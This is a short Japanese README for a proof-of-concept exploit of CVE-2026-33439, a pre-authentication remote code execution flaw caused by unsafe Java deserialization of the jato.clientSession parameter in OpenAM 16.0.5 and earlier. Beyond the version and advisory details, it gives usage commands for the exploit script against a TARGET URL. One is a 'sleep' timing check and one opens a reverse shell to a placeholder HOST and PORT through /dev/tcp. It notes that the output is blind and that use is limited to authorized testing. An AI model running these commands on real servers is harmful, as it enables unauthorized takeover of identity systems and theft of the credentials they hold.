
CVE-2026-33439のPoC。OpenAMにおける安全でないJavaデシリアライゼーションを悪用した認証前RCE。
OpenIdentityPlatform OpenAM における認証前 RCE。jato.clientSession パラメータの安全でない Java デシリアライゼーションを悪用します。影響を受けるバージョンは 16.0.5 以下、16.0.6 で修正済み。
アドバイザリ: https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj
time ./cve-2026-33439.py --url https://TARGET/openam --command 'sleep 3' # takes about 3 seconds
./cve-2026-33439.py --url https://TARGET/openam --command 'bash -i >& /dev/tcp/HOST/PORT 0>&1'
出力はブラインドです。コマンドが終了するまでリクエストがブロックされるため、タイミングによって実行を確認できます(--command 'sleep 5' は約 5 秒かかります)。
許可されたセキュリティテスト専用です。